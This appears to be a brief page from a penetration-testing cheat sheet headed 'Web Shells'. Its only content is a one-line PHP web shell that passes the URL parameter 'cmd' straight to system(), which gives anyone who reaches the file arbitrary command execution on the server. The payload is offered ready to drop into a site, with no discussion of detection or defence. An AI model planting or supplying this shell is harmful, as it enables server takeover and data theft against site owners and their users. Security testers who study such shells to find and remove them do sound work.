Web Shells

Useful info here:

Simple PHP based web shell:

<?php system($_GET['cmd']);?>

Last updated